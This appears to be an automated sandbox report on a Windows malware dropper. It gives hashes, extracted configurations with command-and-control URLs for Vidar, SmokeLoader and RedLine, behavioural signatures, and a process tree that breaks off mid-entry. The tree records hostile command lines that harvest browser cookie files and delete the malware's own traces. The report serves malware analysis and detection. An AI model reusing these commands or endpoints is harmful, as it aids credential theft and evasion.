Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1322s
  • max time network
    1380s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 11:30

General

  • Target

    8 (21).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 27 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1196
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1264
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1872
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1396
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2588
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2712
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                  • Modifies registry class
                  PID:2804
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                    PID:2788
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                      PID:2536
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1076
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:408
                        • C:\Users\Admin\AppData\Roaming\fbtiebg
                          C:\Users\Admin\AppData\Roaming\fbtiebg
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1500
                        • C:\Users\Admin\AppData\Roaming\datiebg
                          C:\Users\Admin\AppData\Roaming\datiebg
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:3876
                          • C:\Users\Admin\AppData\Roaming\datiebg
                            C:\Users\Admin\AppData\Roaming\datiebg
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5972
                        • C:\Users\Admin\AppData\Roaming\datiebg
                          C:\Users\Admin\AppData\Roaming\datiebg
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:5004
                          • C:\Users\Admin\AppData\Roaming\datiebg
                            C:\Users\Admin\AppData\Roaming\datiebg
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4704
                        • C:\Users\Admin\AppData\Roaming\fbtiebg
                          C:\Users\Admin\AppData\Roaming\fbtiebg
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4944
                        • C:\Users\Admin\AppData\Roaming\jttiebg
                          C:\Users\Admin\AppData\Roaming\jttiebg
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6096
                        • C:\Users\Admin\AppData\Roaming\jttiebg
                          C:\Users\Admin\AppData\Roaming\jttiebg
                          2⤵
                            PID:1404
                          • C:\Users\Admin\AppData\Roaming\datiebg
                            C:\Users\Admin\AppData\Roaming\datiebg
                            2⤵
                              PID:5160
                            • C:\Users\Admin\AppData\Roaming\fbtiebg
                              C:\Users\Admin\AppData\Roaming\fbtiebg
                              2⤵
                              • Checks SCSI registry key(s)
                              PID:5444
                          • C:\Users\Admin\AppData\Local\Temp\8 (21).exe
                            "C:\Users\Admin\AppData\Local\Temp\8 (21).exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:652
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3968
                              • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:344
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3292
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_1.exe
                                    sonia_1.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:2216
                                    • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_1.exe" -a
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3912
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3744
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_2.exe
                                    sonia_2.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3932
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1188
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_3.exe
                                    sonia_3.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:2244
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 904
                                      6⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:744
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2168
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_4.exe
                                    sonia_4.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:2340
                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:1588
                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5016
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:5824
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:6092
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                              PID:3692
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:4192
                                            • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                              "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:2852
                                              • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5124
                                            • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              PID:5164
                                              • C:\Windows\winnetdriv.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1627392534 0
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5280
                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5540
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 804
                                                8⤵
                                                • Program crash
                                                PID:5040
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 940
                                                8⤵
                                                • Program crash
                                                PID:3140
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 980
                                                8⤵
                                                • Program crash
                                                PID:4392
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1064
                                                8⤵
                                                • Program crash
                                                PID:5752
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1100
                                                8⤵
                                                • Program crash
                                                PID:640
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1000
                                                8⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Program crash
                                                PID:5668
                                            • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5948
                                              • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                8⤵
                                                • Executes dropped EXE
                                                PID:6056
                                            • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5312
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2124
                                        • C:\Users\Admin\AppData\Local\Temp\7zS08F42D94\sonia_5.exe
                                          sonia_5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:2084
                                          • C:\Users\Admin\Documents\XKfFdckWbm8U8xJ7B5XaJyqc.exe
                                            "C:\Users\Admin\Documents\XKfFdckWbm8U8xJ7B5XaJyqc.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4860
                                            • C:\Users\Admin\Documents\XKfFdckWbm8U8xJ7B5XaJyqc.exe
                                              "C:\Users\Admin\Documents\XKfFdckWbm8U8xJ7B5XaJyqc.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:5460
                                          • C:\Users\Admin\Documents\0qyLa3MxUFpJVX26jh17ng1j.exe
                                            "C:\Users\Admin\Documents\0qyLa3MxUFpJVX26jh17ng1j.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4880
                                          • C:\Users\Admin\Documents\qEtFjQ7XBKlLoPnXPAGIFQM3.exe
                                            "C:\Users\Admin\Documents\qEtFjQ7XBKlLoPnXPAGIFQM3.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:4872
                                          • C:\Users\Admin\Documents\u1eryUMFFO4CrPbtZJZ5e0GU.exe
                                            "C:\Users\Admin\Documents\u1eryUMFFO4CrPbtZJZ5e0GU.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            PID:4852
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im u1eryUMFFO4CrPbtZJZ5e0GU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\u1eryUMFFO4CrPbtZJZ5e0GU.exe" & del C:\ProgramData\*.dll & exit
                                              7⤵
                                                PID:5232
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im u1eryUMFFO4CrPbtZJZ5e0GU.exe /f
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:5952
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  8⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3956
                                            • C:\Users\Admin\Documents\FIAx8n2bW9fRZI5S5grelFeJ.exe
                                              "C:\Users\Admin\Documents\FIAx8n2bW9fRZI5S5grelFeJ.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4844
                                              • C:\Users\Admin\Documents\FIAx8n2bW9fRZI5S5grelFeJ.exe
                                                C:\Users\Admin\Documents\FIAx8n2bW9fRZI5S5grelFeJ.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:6028
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im FIAx8n2bW9fRZI5S5grelFeJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\FIAx8n2bW9fRZI5S5grelFeJ.exe" & del C:\ProgramData\*.dll & exit
                                                  8⤵
                                                    PID:4344
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im FIAx8n2bW9fRZI5S5grelFeJ.exe /f
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5444
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 6
                                                      9⤵
                                                      • Delays execution with timeout.exe
                                                      PID:5620
                                              • C:\Users\Admin\Documents\YrB30iCWq8hCRC3mKgHBqust.exe
                                                "C:\Users\Admin\Documents\YrB30iCWq8hCRC3mKgHBqust.exe"
                                                6⤵
                                                  PID:4836
                                                • C:\Users\Admin\Documents\Fj1aAWcumL5w_QnpKYNgsL8X.exe
                                                  "C:\Users\Admin\Documents\Fj1aAWcumL5w_QnpKYNgsL8X.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Drops startup file
                                                  PID:4900
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4748
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5032
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5928
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4492
                                                • C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe
                                                  "C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4828
                                                  • C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe
                                                    C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5096
                                                  • C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe
                                                    C:\Users\Admin\Documents\zawWeU6QssXRhETc9elI28hn.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5236
                                                • C:\Users\Admin\Documents\hdSe8HF2fMLHHJT_EVMr6uqI.exe
                                                  "C:\Users\Admin\Documents\hdSe8HF2fMLHHJT_EVMr6uqI.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4820
                                                  • C:\Users\Admin\Documents\hdSe8HF2fMLHHJT_EVMr6uqI.exe
                                                    C:\Users\Admin\Documents\hdSe8HF2fMLHHJT_EVMr6uqI.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:6040
                                                • C:\Users\Admin\Documents\dPC_FdwzhuR8TFfG_6poTnOY.exe
                                                  "C:\Users\Admin\Documents\dPC_FdwzhuR8TFfG_6poTnOY.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4812
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    7⤵
                                                      PID:5664
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:4312
                                                  • C:\Users\Admin\Documents\q5v3OBFkSFexxaHLwKMXe3VQ.exe
                                                    "C:\Users\Admin\Documents\q5v3OBFkSFexxaHLwKMXe3VQ.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4976
                                                  • C:\Users\Admin\Documents\l0PfcGkWlwrxQnfsImQDbYLx.exe
                                                    "C:\Users\Admin\Documents\l0PfcGkWlwrxQnfsImQDbYLx.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4964
                                                    • C:\Users\Admin\Documents\l0PfcGkWlwrxQnfsImQDbYLx.exe
                                                      "C:\Users\Admin\Documents\l0PfcGkWlwrxQnfsImQDbYLx.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:5464
                                                  • C:\Users\Admin\Documents\Ewmmi4B2hSCWLwgkL6YGjXK_.exe
                                                    "C:\Users\Admin\Documents\Ewmmi4B2hSCWLwgkL6YGjXK_.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:4944
                                                  • C:\Users\Admin\Documents\3uqWLSJVDOF0YuhvuTZeAvcc.exe
                                                    "C:\Users\Admin\Documents\3uqWLSJVDOF0YuhvuTZeAvcc.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4936
                                                    • C:\Users\Admin\AppData\Roaming\updata.exe
                                                      C:\Users\Admin\AppData\Roaming\updata.exe updata
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:3860
                                                      • C:\Users\Admin\AppData\Roaming\updata.exe
                                                        "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                        8⤵
                                                          PID:5376
                                                        • C:\Users\Admin\AppData\Roaming\updata.exe
                                                          "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                          8⤵
                                                            PID:2080
                                                            • C:\Users\Admin\AppData\Local\Temp\srvs.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\srvs.exe"
                                                              9⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:5916
                                                              • C:\Users\Admin\AppData\Local\Temp\srvs.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\srvs.exe"
                                                                10⤵
                                                                  PID:5264
                                                        • C:\Users\Admin\Documents\RvHfl2V3Q0KMDWkMfW9DOT5P.exe
                                                          "C:\Users\Admin\Documents\RvHfl2V3Q0KMDWkMfW9DOT5P.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4924
                                                          • C:\Users\Admin\Documents\RvHfl2V3Q0KMDWkMfW9DOT5P.exe
                                                            C:\Users\Admin\Documents\RvHfl2V3Q0KMDWkMfW9DOT5P.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:2956
                                                        • C:\Users\Admin\Documents\eqYF2HY5pMXnHgoNKwVKKM0V.exe
                                                          "C:\Users\Admin\Documents\eqYF2HY5pMXnHgoNKwVKKM0V.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4800
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 656
                                                            7⤵
                                                            • Program crash
                                                            PID:5740
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 672
                                                            7⤵
                                                            • Program crash
                                                            PID:5880
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 636
                                                            7⤵
                                                            • Program crash
                                                            PID:6076
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 640
                                                            7⤵
                                                            • Program crash
                                                            PID:4196
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1004
                                                            7⤵
                                                            • Program crash
                                                            PID:5452
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1052
                                                            7⤵
                                                            • Program crash
                                                            PID:5652
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1220
                                                            7⤵
                                                            • Program crash
                                                            PID:4652
                                                          • C:\Windows\SysWOW64\WerFault.exe
